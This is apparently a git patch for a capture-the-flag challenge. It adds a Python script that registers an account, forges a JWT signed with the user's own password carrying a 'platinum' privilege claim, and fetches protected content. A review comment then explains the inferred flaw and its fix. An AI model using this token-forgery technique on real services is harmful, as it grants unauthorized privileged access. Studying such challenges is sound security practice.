From fe3774642f4fcbe4f2039647dd4a23a623ec47a0 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Wed, 11 Dec 2019 00:46:00 +0100
Subject: [PATCH] Day 11 solved
---
Day 11/exploit.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 Day 11/exploit.py
diff --git a/Day 11/exploit.py b/Day 11/exploit.py
new file mode 100644
index 0000000..587dd7b
--- /dev/null
+++ b/Day 11/exploit.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python
+
+import jwt
+import requests
+import sys
+import prompt
+import json
+import time
+
+URL = "http://whale.hacking-lab.com:10101"
+USERNAME = prompt.string("Username: ") if len(sys.argv) < 2 else sys.argv[1]
+PASSWORD = "AAAAAAAAAAAAAAAA"
+
+def registerUser():
+ payload = json.dumps({"username":USERNAME,"password":PASSWORD})
+ res = requests.post(URL + "/fsja/register", data=payload, headers={"Content-Type":"application/json"})
+ if res.status_code != 200:
+ data = res.text
+ if res.status_code == 409 and json.loads(data)["errorMessage"] == "User already exists":
+ return
+
+ print("Server returned %d %s" % (res.status_code, res.reason))
+ print(res.text)
+ exit(1)
+
+def getFlag():
+ payload = {
+ "user": {
+ "username": USERNAME,
+ "platinum": True
+ },
+ "exp": time.time() + 60*60
+ }
+
+ jwtPayload = jwt.encode(payload, PASSWORD, algorithm='HS256').decode("UTF-8")
+ res = requests.get(URL + "/fsja/random?token=%s" % jwtPayload)
+ if res.status_code != 200 and res.status_code != 201:
+ print("Server returned %d %s" % (res.status_code, res.reason))
+ print(res.text)
+ exit(1)
+
+ data = res.text
+ print(json.loads(data)["joke"])
+
+registerUser()
+getFlag()
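Review bot: In getFlag(), `jwt.encode(payload, PASSWORD, algorithm='HS256').decode("UTF-8")` only works on PyJWT 1.x, where encode() returns bytes; on PyJWT 2.x it returns a str and the `.decode` call raises AttributeError, so either pin the library version or normalise with `if isinstance(jwtPayload, bytes): jwtPayload = jwtPayload.decode("UTF-8")`. The file also never states the assumption it depends on: a token signed with the account's own PASSWORD and carrying `"platinum": True` is accepted, which suggests (inferred, not shown here) that the service verifies HS256 with the user's password and trusts client-supplied claims. A header comment saying so, together with the remediation (sign with a server-only key and look privileges up server-side instead of reading them from the token), would make the finding readable to whoever has to fix the service. Both `requests.post` and `requests.get` are called without `timeout=`, so an unresponsive host hangs the script, and `json.loads(data)["errorMessage"]` in registerUser() will raise on a 409 whose body is not the expected JSON.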